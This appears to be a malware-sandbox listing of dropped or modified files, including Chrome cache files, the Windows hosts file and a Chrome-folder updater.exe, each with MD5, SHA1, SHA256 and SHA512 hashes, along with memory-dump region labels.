C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_00000c

MD5 189badc72a668aade50699ae05067c2a
SHA1 5458410fc96bcf08b29f204b05470dad5882afb9
SHA256 896d76b06fe7bc62fa10e8f9091b84584d8fdbd7eaaea1183f7c1e5e3a98c559
SHA512 287ff71f9b6ab261f989792cfee0b99e1745c57e8e8c9c3c55e07592a835008673a9ee5b2099ef9beb6ef4343c10827109b281b2fbed0fe0de1da020723c622b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_00000b

MD5 7db3096a5ce269d5140afbedb84e0fb7
SHA1 1155014e26835855c4177e8916b0bbcd5e4cca61
SHA256 48662b9313a828746c1ba3edfa196d8ecd6b0ca730848ead5418fcde8da4a809
SHA512 a349f3265db5ebff9e535778ccc92bc846fa9a4175dbf4d9c0e5b77d294ae521eca5f104d45f0eab0bba88120a08103ce997a420ecace703e211796e842ca7dc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_00000a

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_000009

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_000008

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_000007

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_000006

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_000005

MD5 b096dc9a3e4e6748a91abe826cf5d165
SHA1 b115fd9390e39b86a711039745cbad73741d7252
SHA256 7552567793d51609afaac7d5e1b3d2289f1a64a323a84c74c28fe615075e1c3f
SHA512 c075f36473b578f645ab66f1800d6e0a61b66719361c8c730ccb4505c1ab127ce96d5409c0c82aeddbc2bd03bef6c7a905310e4462ac7a0ebb2e07b45cf33a94

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_000004

MD5 5641d2e6eb6f88f5c306ef14bcda7513
SHA1 1714fcfbf63fc8d860c0edb99ca221ac99194f07
SHA256 d573a0546fac381049946c0b0bdad4c42d2e60b572b79ed8c41e51894d9ef1ab
SHA512 2f4d2220ce860110fb6ad9b438b05d43551577f93f45bc97f56aa80c89e1a369734b64c190335a9df1963c547a5b607c5f8e3e229da906a36ff6f96d387a1774

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_000003

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_000002

MD5 d9e6dbdb9540a397f37066f3ca288bbb
SHA1 d6a1fdb8ff8cd9ad1bfd79243d1cc106b162a057
SHA256 7f4a4285ef9442b9075f46e6ae38183d9cf0a7e69533ccf02c23c1f977925e86
SHA512 3b5b854d338cd6036af3835e378ae18f731aa61f832a1b91d87cd8dc04daac659b704136b664817ebed49d808efd075957fa01d1d2c0d345ef278f2927d440ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\f_000001

MD5 01af703c52ac5a93685bb3911d6918f1
SHA1 cbb1279745c1c2208fb9b8606e3d3513cd5dc3e7
SHA256 75ecbede729daef7531a6e43dcaf82afd1ac691c5a993231ddbe40254bf01653
SHA512 fbf1f2a3180f001cab1a860425f750010d6932479b343d5848ee0a78e03e29a46a123ee0103560d87df32daa3f6878cde07927e11e0615ad8e3c8e1568b942c6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\data_3

MD5 ae856b8eb177aef7b296534a4ae4a5be
SHA1 1e551ad732ba76451c6e92921939d4e7bd7569b9
SHA256 1b36f9062b8861a850e22c48f3a1e5672dae01780bed24fcc57cfd8881ec5a0b
SHA512 7a940a9353bfb29c4fb048b1e19a04a3b5efb57ab0d57ebe7f1dea0d43ebe3b7c45573b49bd58e2d7c20a021155c6877febbd203ae36822e9cf75b4be540d33d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\data_2

MD5 caec2aeb048e2c6bd54d47c8cf2194e6
SHA1 8dea7788e1a0c02f11b8fe5125f9ae0b029f45ac
SHA256 d397f219f344a08da338ce2804b6be87d7050bde2737ab95619c2f4ede98c815
SHA512 4add6c029a19ef814891d74a414ed51169aa3001aaf06d7be07cc35bcdc373a1dbe4abd42d05c3d39c05143647fc976e7bb05007dafd1133c43edb73228297bf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\data_1

MD5 a86faab6a3a92d9952a209d50c81e3eb
SHA1 d167b4b410949a3909c34aa863a1c89183677ea6
SHA256 2f73c8959ff00ed88abf3a7576e6bcb16ddae5c6fcf6647bd37658af47bbc0fe
SHA512 41b0aa7f86ac4f49e0338b45e24ee7b807748c02d1640f241fdfadf52bcdb62dfd752aee92e12c0afce6bbabaa773a08640043280a539faa1b1a78c325232359

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Cache\Cache_Data\data_0

MD5 f1317ae3bbe08e3c192c51371d741bb0
SHA1 d23c39346c856799baf18f11b67a9a4f3696c453
SHA256 455dac7db749213477ccbd08a517223d5d478de6d0ad3cb70ad2cccc9a0e0f51
SHA512 2cd5f110a9070b17da126296330b0133b79bc9ff8e5c811084ed3c5f812f913aa4fd01539c9cfbbd7af3e44d04a585c04530c78ef0c156bdde61e7eb87c67975

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\DevToolsActivePort

MD5 575bc3047a567c592e6461d6f85091f7
SHA1 fc40c11d8c4e118434d00a694fbf17cc37222b61
SHA256 1def676019d4d7661617b609bbe8d21c44b5719dee789896ec28013fd70401c0
SHA512 1701f58c283e63c4752a7b9fe8e2ae780a5d0ac03336be256622831cb19359748af8de784a5bd27ac4bafd3e28150241c336d698d6e08602293f91866516645d

memory/3312-692-0x00007FF976CD0000-0x00007FF9776BC000-memory.dmp

memory/4532-684-0x00000000FF320000-0x00000000FF330000-memory.dmp

memory/4532-682-0x00000000FF320000-0x00000000FF330000-memory.dmp

memory/4532-681-0x00000000FF320000-0x00000000FF330000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

memory/4532-670-0x00000000FF320000-0x00000000FF330000-memory.dmp

memory/4532-671-0x00000000FF320000-0x00000000FF330000-memory.dmp

memory/4532-668-0x00000000FF320000-0x00000000FF330000-memory.dmp

memory/4532-665-0x00000000FF320000-0x00000000FF330000-memory.dmp

memory/4532-662-0x0000000000400000-0x0000000000527000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08